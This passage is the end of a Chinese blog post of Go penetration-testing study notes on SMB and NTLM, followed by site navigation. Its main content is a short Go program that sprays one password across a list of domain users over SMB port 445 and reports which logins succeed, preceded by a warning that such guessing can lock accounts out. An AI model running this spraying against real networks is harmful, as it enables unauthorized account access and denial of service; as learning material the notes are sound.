<p>在线密码猜测可以将账户锁定在域之外，从而有效的实施拒绝服务攻击，测试时务必谨慎。</p>
</blockquote>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> main</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> (</span><br><span class="line">	<span class="string">&quot;bytes&quot;</span></span><br><span class="line">	<span class="string">&quot;fmt&quot;</span></span><br><span class="line">	<span class="string">&quot;io/ioutil&quot;</span></span><br><span class="line">	<span class="string">&quot;log&quot;</span></span><br><span class="line">	<span class="string">&quot;os&quot;</span></span><br><span class="line"></span><br><span class="line">	<span class="string">&quot;github.com/blackhat-go/bhg/ch-6/smb/smb&quot;</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">main</span><span class="params">()</span></span> &#123;</span><br><span class="line">	<span class="keyword">if</span> <span class="built_in">len</span>(os.Args) != <span class="number">5</span> &#123;</span><br><span class="line">		log.Fatalln(<span class="string">&quot;Usage: main &lt;/user/file&gt; &lt;password&gt; &lt;domain&gt; &lt;target_host&gt;&quot;</span>)</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	buf, err := ioutil.ReadFile(os.Args[<span class="number">1</span>])</span><br><span class="line">	<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">		log.Fatalln(err)</span><br><span class="line">	&#125;</span><br><span class="line">	options := smb.Options&#123;</span><br><span class="line">		Password: os.Args[<span class="number">2</span>],</span><br><span class="line">		Domain:   os.Args[<span class="number">3</span>],</span><br><span class="line">		Host:     os.Args[<span class="number">4</span>],</span><br><span class="line">		Port:     <span class="number">445</span>,</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	users := bytes.Split(buf, []<span class="type">byte</span>&#123;<span class="string">&#x27;\n&#x27;</span>&#125;)</span><br><span class="line">	<span class="keyword">for</span> _, user := <span class="keyword">range</span> users &#123;</span><br><span class="line">		options.User = <span class="type">string</span>(user)</span><br><span class="line">		session, err := smb.NewSession(options, <span class="literal">false</span>)</span><br><span class="line">		<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">			fmt.Printf(<span class="string">&quot;[-] Login failed: %s\\%s [%s]\n&quot;</span>,</span><br><span class="line">				options.Domain,</span><br><span class="line">				options.User,</span><br><span class="line">				options.Password)</span><br><span class="line">			<span class="keyword">continue</span></span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">defer</span> session.Close()</span><br><span class="line">		<span class="keyword">if</span> session.IsAuthenticated &#123;</span><br><span class="line">			fmt.Printf(<span class="string">&quot;[+] Success     : %s\\%s [%s]\n&quot;</span>,</span><br><span class="line">				options.Domain,</span><br><span class="line">				options.User,</span><br><span class="line">				options.Password)</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="0x04-通过pass-the-hash重用密码"><a href="#0x04-通过pass-the-hash重用密码" class="headerlink" title="0x04 通过pass the hash重用密码"></a>0x04 通过pass the hash重用密码</h2><p>先搁一下，学内网的时候在返回来看。</p>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">h0ld1rs</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://h0ld1rs.github.io/posts/36907.html">https://h0ld1rs.github.io/posts/36907.html</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://h0ld1rs.github.io" target="_blank">h0ld1rs的博客</a>！</span></div></div><div class="tag_share"><div class="post_share"><div class="social-share" data-image="/img/image/7.png" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/posts/166.html"><img class="prev-cover" src="/img/image/8.png" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">Go渗透测试笔记(七)</div></div></a></div><div class="next-post pull-right"><a href="/posts/12296.html"><img class="next-cover" src="/img/image/6.png" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">Go渗透测试笔记(五)</div></div></a></div></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i><span>相关推荐</span></div><div class="relatedPosts-list"><div><a href="/posts/61606.html" title="Go渗透测试笔记(一)"><img class="cover" src="/img/image/2.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-02-14</div><div class="title">Go渗透测试笔记(一)</div></div></a></div><div><a href="/posts/31081.html" title="go渗透测试笔记(二)"><img class="cover" src="/img/image/3.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-02-18</div><div class="title">go渗透测试笔记(二)</div></div></a></div><div><a href="/posts/32502.html" title="Go渗透测试笔记(三)"><img class="cover" src="/img/image/4.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-03-01</div><div class="title">Go渗透测试笔记(三)</div></div></a></div><div><a href="/posts/13916.html" title="Go渗透测试笔记(四)"><img class="cover" src="/img/image/5.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-03-02</div><div class="title">Go渗透测试笔记(四)</div></div></a></div><div><a href="/posts/12296.html" title="Go渗透测试笔记(五)"><img class="cover" src="/img/image/6.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-03-04</div><div class="title">Go渗透测试笔记(五)</div></div></a></div><div><a href="/posts/166.html" title="Go渗透测试笔记(七)"><img class="cover" src="/img/image/8.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-03-05</div><div class="title">Go渗透测试笔记(七)</div></div></a></div></div></div><hr/><div id="post-comment"><div class="comment-head"><div class="comment-headline"><i class="fas fa-comments fa-fw"></i><span> 评论</span></div></div><div class="comment-wrap"><div><div id="twikoo-wrap"></div></div></div></div></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="/img/1.jpg" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">h0ld1rs</div><div class="author-info__description">希望能认识更多师傅，学到更多东西</div></div><div class="card-info-data is-center"><div class="card-info-data-item"><a href="/archives/"><div class="headline">文章</div><div class="length-num">9</div></a></div><div class="card-info-data-item"><a href="/tags/"><div class="headline">标签</div><div class="length-num">3</div></a></div><div class="card-info-data-item"><a href="/categories/"><div class="headline">分类</div><div class="length-num">3</div></a></div></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/h0ld1rs"><i class="fab fa-github"></i><span>Follow Me</span></a></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>公告</span></div><div class="announcement_content">This is my Blog</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Go%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E7%AC%94%E8%AE%B0-%E5%85%AD-%E2%80%93%E4%B8%8ESMB%E5%92%8CNTLM%E4%BA%A4%E4%BA%92"><span class="toc-number">1.</span> <span class="toc-text">Go渗透测试笔记(六)–与SMB和NTLM交互</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-%E5%89%8D%E8%A8%80"><span class="toc-number">1.1.</span> <span class="toc-text">0x00 前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-SMB%E5%8C%85"><span class="toc-number">1.2.</span> <span class="toc-text">0x01 SMB包</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-%E7%90%86%E8%A7%A3SMB"><span class="toc-number">1.3.</span> <span class="toc-text">0x02 理解SMB</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E7%90%86%E8%A7%A3SMB%E5%AE%89%E5%85%A8%E4%BB%A4%E7%89%8C"><span class="toc-number">1.3.1.</span> <span class="toc-text">1. 理解SMB安全令牌</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E5%88%9B%E5%BB%BA%E4%B8%80%E4%B8%AASMB%E4%BC%9A%E8%AF%9D"><span class="toc-number">1.3.2.</span> <span class="toc-text">2. 创建一个SMB会话</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E4%BD%BF%E7%94%A8%E7%BB%93%E6%9E%84%E5%9F%9F%E7%9A%84%E6%B7%B7%E5%90%88%E7%BC%96%E7%A0%81"><span class="toc-number">1.3.3.</span> <span class="toc-text">3. 使用结构域的混合编码</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-%E7%BC%96%E5%86%99%E8%87%AA%E5%AE%9A%E4%B9%89%E7%9A%84%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%BB%93%E6%9E%84"><span class="toc-number">1.3.3.1.</span> <span class="toc-text">1. 编写自定义的序列化和反序列化结构</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-%E5%8C%85%E8%A3%85%E6%8E%A5%E5%8F%A3"><span class="toc-number">1.3.3.2.</span> <span class="toc-text">2. 包装接口</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-%E5%BC%BA%E5%88%B6ASN-1%E7%BC%96%E7%A0%81"><span class="toc-number">1.3.3.3.</span> <span class="toc-text">3. 强制ASN.1编码</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4-%E4%BA%86%E8%A7%A3%E5%85%83%E6%95%B0%E6%8D%AE%E5%92%8C%E5%BC%95%E7%94%A8%E5%AD%97%E6%AE%B5"><span class="toc-number">1.3.3.4.</span> <span class="toc-text">4. 了解元数据和引用字段</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#5-SMB%E7%9A%84%E5%AE%9E%E7%8E%B0"><span class="toc-number">1.3.3.5.</span> <span class="toc-text">5. SMB的实现</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-%E4%BD%BF%E7%94%A8SMB%E5%8C%85%E7%8C%9C%E6%B5%8B%E5%AF%86%E7%A0%81"><span class="toc-number">1.4.</span> <span class="toc-text">0x03 使用SMB包猜测密码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-%E9%80%9A%E8%BF%87pass-the-hash%E9%87%8D%E7%94%A8%E5%AF%86%E7%A0%81"><span class="toc-number">1.5.</span> <span class="toc-text">0x04 通过pass the hash重用密码</span></a></li></ol></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/posts/42607.html" title="java字节码加载的相关笔记"><img src="/img/image/9.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="java字节码加载的相关笔记"/></a><div class="content"><a class="title" href="/posts/42607.html" title="java字节码加载的相关笔记">java字节码加载的相关笔记</a><time datetime="2022-03-11T12:34:06.000Z" title="发表于 2022-03-11 20:34:06">2022-03-11</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/166.html" title="Go渗透测试笔记(七)"><img src="/img/image/8.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Go渗透测试笔记(七)"/></a><div class="content"><a class="title" href="/posts/166.html" title="Go渗透测试笔记(七)">Go渗透测试笔记(七)</a><time datetime="2022-03-05T12:31:26.000Z" title="发表于 2022-03-05 20:31:26">2022-03-05</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/36907.html" title="Go渗透测试笔记(六)"><img src="/img/image/7.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Go渗透测试笔记(六)"/></a><div class="content"><a class="title" href="/posts/36907.html" title="Go渗透测试笔记(六)">Go渗透测试笔记(六)</a><time datetime="2022-03-05T03:16:23.000Z" title="发表于 2022-03-05 11:16:23">2022-03-05</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/12296.html" title="Go渗透测试笔记(五)"><img src="/img/image/6.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Go渗透测试笔记(五)"/></a><div class="content"><a class="title" href="/posts/12296.html" title="Go渗透测试笔记(五)">Go渗透测试笔记(五)</a><time datetime="2022-03-04T10:17:05.000Z" title="发表于 2022-03-04 18:17:05">2022-03-04</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/13916.html" title="Go渗透测试笔记(四)"><img src="/img/image/5.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Go渗透测试笔记(四)"/></a><div class="content"><a class="title" href="/posts/13916.html" title="Go渗透测试笔记(四)">Go渗透测试笔记(四)</a><time datetime="2022-03-02T03:46:28.000Z" title="发表于 2022-03-02 11:46:28">2022-03-02</time></div></div></div></div></div></div></main><footer id="footer" style="background-image: url('/img/image/7.png')"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2022 By h0ld1rs</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><a id="to_comment" href="#post-comment" title="直达评论"><i class="fas fa-comments"></i></a><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.js"></script><div class="js-pjax"><script>(()=>{
  const init = () => {
    twikoo.init(Object.assign({
      el: '#twikoo-wrap',
      envId: 'commnet-1gmkug2k1ca99452',
      region: '',
      onCommentLoaded: function () {
        btf.loadLightbox(document.querySelectorAll('#twikoo .tk-content img:not(.vemoji)'))
      }
    }, null))
  }

  const getCount = () => {
    twikoo.getCommentsCount({
      envId: 'commnet-1gmkug2k1ca99452',
      region: '',
      urls: [window.location.pathname],
      includeReply: false
    }).then(function (res) {
      document.getElementById('twikoo-count').innerText = res[0].count
    }).catch(function (err) {
      console.error(err);
    });
  }

  const runFn = () => {
    init()
    GLOBAL_CONFIG_SITE.isPost && getCount()
  }

  const loadTwikoo = () => {
    if (typeof twikoo === 'object') {
      setTimeout(runFn,0)
      return
    } 
    getScript('https://cdn.jsdelivr.net/npm/twikoo/dist/twikoo.all.min.js').then(runFn)
  }

  if ('Twikoo' === 'Twikoo' || !false) {
    if (false) btf.loadComment(document.getElementById('twikoo-wrap'), loadTwikoo)
    else loadTwikoo()
  } else {
    window.loadOtherComment = () => {
      loadTwikoo()
    }
  }
})()</script></div><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>